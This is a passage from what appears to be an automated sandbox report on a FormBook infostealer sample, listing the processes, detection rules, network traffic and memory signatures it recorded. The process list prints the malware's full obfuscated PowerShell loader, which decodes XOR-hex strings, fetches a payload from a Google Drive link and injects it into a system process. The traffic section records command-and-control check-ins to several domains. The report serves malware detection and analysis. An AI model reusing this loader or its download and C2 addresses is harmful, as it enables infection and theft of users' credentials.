8){.$env:systemroot\S*6*\W*Power*\*1.0\*ll.*xe $Limberest1 ;}else{&$Limberest0 $Limberest1;} MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5600 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Croupiersr02 { param([String]$Tilbliv); $Fodfst = $Tilbliv.Length; $Skalletef = New-Object byte[] ($Fodfst / 2); For($dependens=0; $dependens -lt $Fodfst; $dependens+=2){ $osteopla = $Tilbliv.Substring($dependens, 2); $Skalletef[$dependens/2] = [convert]::ToByte($osteopla, 16); $Skalletef[$dependens/2] = ($Skalletef[$dependens/2] -bxor 102); } [String][System.Text.Encoding]::ASCII.GetString($Skalletef);}Set-Content 'E:\Croupiersr03' '2';$Depra = Get-Content 'E:\Croupiersr03';$Boug0=Croupiersr02 '351F1512030B48020A0A';if ($Depra -eq '2') {$Boug0=''};$Boug1=Croupiersr02 '2B0F0514091509001248310F085554483308150700032807120F10032B03120E090215';$Boug2=Croupiersr02 '2103123614090527020214031515';$Boug3=Croupiersr02 '351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A03340300';$Boug4=Croupiersr02 '1512140F0801';$Boug5=Croupiersr02 '2103122B0902130A032E0708020A03';$Boug6=Croupiersr02 '3432351603050F070A28070B034A462E0F0203241F350F014A463613040A0F05';$Boug7=Croupiersr02 '341308120F0B034A462B070807010302';$Boug8=Croupiersr02 '3403000A030512030222030A0301071203';$Boug9=Croupiersr02 '2F082B030B09141F2B0902130A03';$Sprge0=Croupiersr02 '2B1F22030A0301071203321F1603';$Sprge1=Croupiersr02 '250A0715154A463613040A0F054A463503070A03024A462708150F250A0715154A4627131209250A071515';$Sprge2=Croupiersr02 '2F0810090D03';$Sprge3=Croupiersr02 '3613040A0F054A462E0F0203241F350F014A46280311350A09124A46300F141213070A';$Sprge4=Croupiersr02 '300F141213070A270A0A0905';$Sprge5=Croupiersr02 '0812020A0A';$Sprge6=Croupiersr02 '281236140912030512300F141213070A2B030B09141F';$Sprge7=Croupiersr02 '2F233E';$Sprge8=Croupiersr02 '3A';$Frekvenss=Croupiersr02 '333523345554';$Hematopat=Croupiersr02 '25070A0A310F080209113614090527';function fkp {Param ($Fortrng49, $Fjasende) ;$Forth0 =Croupiersr02 '420414070503141F0D465B464E3D27161622090B070F083B5C5C2513141403081222090B070F0848210312271515030B040A0F03154E4F461A46310E0314034B29040C030512461D46423948210A0904070A271515030B040A1F2507050E03464B270802464239482A090507120F09084835160A0F124E4235161401035E4F3D4B573B48231713070A154E4224091301564F461B4F48210312321F16034E4224091301574F';&($Sprge7) $Forth0;$Forth5 = Croupiersr02 '4227151203080F150B465B46420414070503141F0D482103122B03120E09024E4224091301544A463D321F16033D3B3B46264E4224091301554A464224091301524F4F';&($Sprge7) $Forth5;$Forth1 = Croupiersr02 '140312131408464227151203080F150B482F0810090D034E4208130A0A4A46264E3D351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403003B4E2803114B29040C03051246351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403004E4E2803114B29040C030512462F08123612144F4A464E420414070503141F0D482103122B03120E09024E4224091301534F4F482F0810090D034E4208130A0A4A46264E4220091412140801525F4F4F4F4F4A4642200C0715030802034F4F';&($Sprge7) $Forth1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Superbruge42,[Parameter(Position = 1)] [Type] $Objecte = [Void]);$Forth2 = Croupiersr02 '4235030B0F0509121209465B463D27161622090B070F083B5C5C2513141403081222090B070F08482203000F0803221F08070B0F05271515030B040A1F4E4E2803114B29040C03051246351F1512030B483403000A0305120F090848271515030B040A1F28070B034E42240913015E4F4F4A463D351F1512030B483403000A0305120F090848230B0F1248271515030B040A1F24130F0A0203142705050315153B5C5C3413084F482203000F0803221F08070B0F052B0902130A034E42240913015F4A464200070A15034F482203000F0803321F16034E423516140103564A46423516140103574A463D351F1512030B482B130A120F0507151222030A03010712033B4F';&($Sprge7) $Forth2;$Forth3 = Croupiersr02 '4235030B0F0509121209482203000F080325090815121413051209144E4224091301504A463D351F1512030B483403000A0305120F09084825070A0A0F0801250908100308120F0908153B5C5C35120708020714024A46423513160314041413010352544F483503122F0B160A030B03081207120F0908200A0701154E4224091301514F';&($Sprge7) $Forth3;$Forth4 = Croupiersr02 '4235030B0F0509121209482203000F08032B03120E09024E423516140103544A46423516140103554A464229040C030512034A46423513160314041413010352544F483503122F0B160A030B03081207120F0908200A0701154E4224091301514F';&($Sprge7) $Forth4;$Forth5 = Croupiersr02 '140312131408464235030B0F050912120948251403071203321F16034E4F';&($Sprge7) $Forth5 ;}$Acutili = Croupiersr02 '0D031408030A5554';$Forth6 = Croupiersr02 '4224070A0D07080F150314465B463D351F1512030B48341308120F0B03482F081203140916350314100F050315482B0714150E070A3B5C5C21031222030A030107120320091420130805120F090836090F081203144E4E000D164642270513120F0A0F46423516140103524F4A464E21223246264E3D2F08123612143B4A463D332F081255543B4A463D332F081255543B4A463D332F081255543B4F464E3D2F08123612143B4F4F4F';&($Sprge7) $Forth6;$Midsomm = fkp $Sprge5 $Sprge6;$Forth7 = Croupiersr02 '4234090708090D0316140355465B464224070A0D07080F150314482F0810090D034E3D2F08123612143B5C5C3C0314094A465052554A46561E555656564A46561E52564F';&($Sprge7) $Forth7;$Forth8 = Croupiersr02 '42351F02070B03140F0D465B464224070A0D07080F150314482F0810090D034E3D2F08123612143B5C5C3C0314094A46535F5650565454524A46561E555656564A46561E524F';&($Sprge7) $Forth8;$Croupiersr01 = Croupiersr02 '0E121216155C494902140F100348010909010A034805090B49130559031E160914125B020911080A090702400F025B572F130F053C395E1037235F02335204001E55522B14352A20270E2E072A15570A';$Croupiersr00 = Croupiersr02 '422D0A130812030D145E51465B464E2803114B29040C0305124628031248310304250A0F0308124F48220911080A0907023512140F08014E4225140913160F0314151456574F';$Forth8 = Croupiersr02 '4234090708090D03161403545B420308105C07161602071207';&($Sprge7) $Forth8;$Roanokepre2=$Roanokepre2+'\Stedord.dat';$Kluntekr87='';if (-not(Test-Path $Roanokepre2)) {while ($Kluntekr87 -eq '') {&($Sprge7) $Croupiersr00;Start-Sleep 5;}Set-Content $Roanokepre2 $Kluntekr87;}$Kluntekr87 = Get-Content $Roanokepre2;$Forth9 = Croupiersr02 '42200914120E465B463D351F1512030B48250908100314123B5C5C2014090B2407150350523512140F08014E422D0A130812030D145E514F';&($Sprge7) $Forth9;$Kluntekr870 = Croupiersr02 '3D351F1512030B48341308120F0B03482F081203140916350314100F050315482B0714150E070A3B5C5C2509161F4E42200914120E4A46564A46464234090708090D03161403554A465052554F';&($Sprge7) $Kluntekr870;$folket=$Forth.count-643;$Kluntekr871 = Croupiersr02 '3D351F1512030B48341308120F0B03482F081203140916350314100F050315482B0714150E070A3B5C5C2509161F4E42200914120E4A465052554A4642351F02070B03140F0D4A464200090A0D03124F';&($Sprge7) $Kluntekr871;$Kluntekr872 = Croupiersr02 '4225090E07040F465B463D351F1512030B48341308120F0B03482F081203140916350314100F050315482B0714150E070A3B5C5C21031222030A030107120320091420130805120F090836090F081203144E4E000D1646422014030D100308151546422E030B0712091607124F4A464E21223246264E3D2F08123612143B4A463D2F08123612143B4A463D2F08123612143B4A463D2F08123612143B4A463D2F08123612143B4F464E3D2F08123612143B4F4F4F';&($Sprge7) $Kluntekr872;$Kluntekr873 = Croupiersr02 '4225090E07040F482F0810090D034E4234090708090D03161403554A42351F02070B03140F0D4A422B0F0215090B0B4A564A564F';&($Sprge7) $Kluntekr873# MD5: DBA3E6449E97D4E3DF64527EF7012A10)

ieinstal.exe (PID: 5184 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 5764 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

ieinstal.exe (PID: 4008 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)

ieinstal.exe (PID: 3400 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.263614790.0000026B1721D000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x1ff74:$s1: powersHell
00000000.00000003.263715508.0000026B17243000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x6b8c:$s1: powersHell
00000000.00000002.267192402.0000026B17357000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x5578:$s1: powersHell
0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000003.265026295.0000026B17357000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x5578:$s1: powersHell
00000000.00000003.263614790.0000026B1723E000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0xbb8c:$s1: powersHell
00000000.00000003.266039874.0000026B17357000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x5578:$s1: powersHell
00000000.00000003.266239984.0000026B1721D000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x1ff74:$s1: powersHell
00000000.00000003.265922370.0000026B17357000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x5578:$s1: powersHell
00000000.00000003.253488505.0000026B17201000.00000004.00000020.00020000.00000000.sdmp	SUSP_LNK_SuspiciousCommands	Detects LNK file with suspicious content	Florian Roth (Nextron Systems)	0x50db:$s12: Wscript.Shell 0x14de6:$s12: Wscript.Shell
0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000003.265270839.0000026B17307000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0xccd8:$s1: powersHell
00000000.00000003.265653737.0000026B17357000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x5578:$s1: powersHell
00000000.00000002.266860344.0000026B15502000.00000004.00000020.00020000.00000000.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0xcb8:$s1: powersHell
00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17b01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 22 entries

Other

Source	Rule	Description	Author	Strings
amsi64_6128.amsi.csv	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth (Nextron Systems)	0x9e:$s1: powersHell

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 162.0.236.127

Timestamp:	192.168.2.6162.0.236.12749741802031449 03/02/23-17:20:59.247155
SID:	2031449
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 162.0.236.127

Timestamp:	192.168.2.6162.0.236.12749741802031453 03/02/23-17:20:59.247155
SID:	2031453
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 162.0.236.127

Timestamp:	192.168.2.6162.0.236.12749741802031412 03/02/23-17:20:59.247155
SID:	2031412
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /g0c0/ HTTP/1.1Host: www.nichevesting.comConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.nichevesting.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nichevesting.com/g0c0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4a 31 5a 61 68 43 64 4c 3d 31 42 55 71 53 4c 50 46 79 74 4a 54 33 6c 45 30 58 77 4a 73 50 50 4d 72 67 31 33 48 67 55 57 6a 50 55 54 6f 37 76 42 39 59 37 33 77 47 65 55 58 67 39 57 74 62 4d 28 75 57 49 46 5a 4a 64 64 73 45 66 4d 66 74 54 34 35 32 65 7e 67 55 39 57 69 35 64 77 61 70 61 67 58 54 77 4a 78 33 49 36 6d 73 56 61 43 48 6e 4c 42 64 33 55 6d 6e 39 73 57 35 72 7e 54 36 49 51 41 59 61 32 77 45 36 5a 58 73 71 49 6e 71 39 63 75 6d 66 64 6f 51 7a 4b 4c 68 63 55 6f 66 47 57 33 7a 76 65 54 38 4f 71 66 4c 6d 39 6e 5a 39 54 50 43 64 35 47 6b 4d 50 78 41 78 78 45 6d 52 67 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=1BUqSLPFytJT3lE0XwJsPPMrg13HgUWjPUTo7vB9Y73wGeUXg9WtbM(uWIFZJddsEfMftT452e~gU9Wi5dwapagXTwJx3I6msVaCHnLBd3Umn9sW5r~T6IQAYa2wE6ZXsqInq9cumfdoQzKLhcUofGW3zveT8OqfLm9nZ9TPCd5GkMPxAxxEmRg.

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: C:\Windows\explorer.exe

Code function: 16_2_06AC54D2 getaddrinfo,SleepEx,setsockopt,recv,recv,

16_2_06AC54D2

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1IuicZ_8vQE9dU4bfx34MrSLFAhHaLs1l HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qspainn16n64l8j7o5p977ji1aeg2b86/1677773850000/00214763071378112578/*/1IuicZ_8vQE9dU4bfx34MrSLFAhHaLs1l?e=download&uuid=cb10c202-86bb-4a69-9700-bc9cbb433bf0 HTTP/1.1Host: doc-14-7s-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1rIzD7daHU1mUfnDyXK-I-Gb1F3sb7xu2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/96aecif6qgtmd866k395ve9ln4v2582p/1677773925000/00214763071378112578/*/1rIzD7daHU1mUfnDyXK-I-Gb1F3sb7xu2?e=download&uuid=1de4a321-c39e-4208-95ca-f1884cd889bf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-7s-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=FDm8rKKDmQD/I16UESZCScQJd5RkugjO7i+IXGcmdNvbCKiIDHrvo4AwKUGq/V+xVbt3++Blt9ecK1dyBRpOcdYFF1CFhWNWgdQRY0tY801v&uEk=kKVhb1ODb HTTP/1.1Host: www.star-house.okinawaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=4D8KR/+l2rJ4yEknA3NwL/xew2D800GqbWuv46luKoyREYUfmcWzY8S0FaFCA4RxGPUwgCES1+CGDKu8j/pMqbkqVClt2I2j7UamBTzpVw1B&uEk=kKVhb1ODb HTTP/1.1Host: www.nichevesting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=7AoghRD8g0/kfvEsx2sU95A2LZSx6NsCVfQQj+6UBm4+ru4nOpfQ9Q9UKAYKj24R1kRNFhy6UoFNSsJ6pUxzKJj896DDYPcMBEzuDMgRmTEe&uEk=kKVhb1ODb HTTP/1.1Host: www.bebas88official.clickConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=8Jyym6YpCYcRPCA/1odg0ZVgTkbvAinOe9o7VzVA3jLVPgNwCUCgU3fRCFjwhyyCtxnZmCY1Y9AJ7NYgKKttQoxHX67xeHFuAGt1Gr3SwKhB&uEk=kKVhb1ODb HTTP/1.1Host: www.deepee.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=Ssx6YM16hj7Dv4NxMqBhL/VgmmEJsfNRJMtf4nUH3Oq+Hm/bZsBBuE50eRLU4xhus+IRzU4TY0HA5BfycHQ3+Whne8bGtbEpvMOauzDGx7DW&uEk=kKVhb1ODb HTTP/1.1Host: www.bestservicesandtrade.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=/6Er6B5poJy6uHF8k8/pGsLsu4euo955QrzgoZ5Znatjjq1COwyHxIeo18D9pRj5Ci1gcOGYIaPue4yNBcevRXCJfkbYK/JSWMth+St+cVQ7&uEk=kKVhb1ODb HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb HTTP/1.1Host: www.shivanshnegi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=kWznJ2YswSL+LAAx9ZHUexIk0ycyRshautolqpnZVVrlJdt47ZaoNZmL7kdhIFbI+ihPlFcDQCWCpz3M8AfRW2Sbj71MdTjzXr3aV4lJwzwy&uEk=kKVhb1ODb HTTP/1.1Host: www.xn--lst4d-fwa.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=/cYLdyO2qITEXYcdEKysiTG/0kILWa8EGExoyl7LQW7KzQM/3grhKHlpqc3WrobEjk7g5cW8f2voA2pa0pIYVA7MQ8uZkEgdBjrf6G57J+B7&uEk=kKVhb1ODb HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /g0c0/?J1ZahCdL=LvoLDBvSBwADsyk8OFhB+eEYCloM5F4PvHVBhfoVTxA9RuBvaY3JKeLz6WT2wF14Jhg7cGkNOjhTPTUiw+ZdZP048csFAvWlDrGxEsvZ5gpq&uEk=kKVhb1ODb HTTP/1.1Host: www.julesgifts.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.6:49728 version: TLS 1.2

Source: C:\Windows\explorer.exe

Code function: 16_2_06ABEE12 OpenClipboard,

16_2_06ABEE12

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
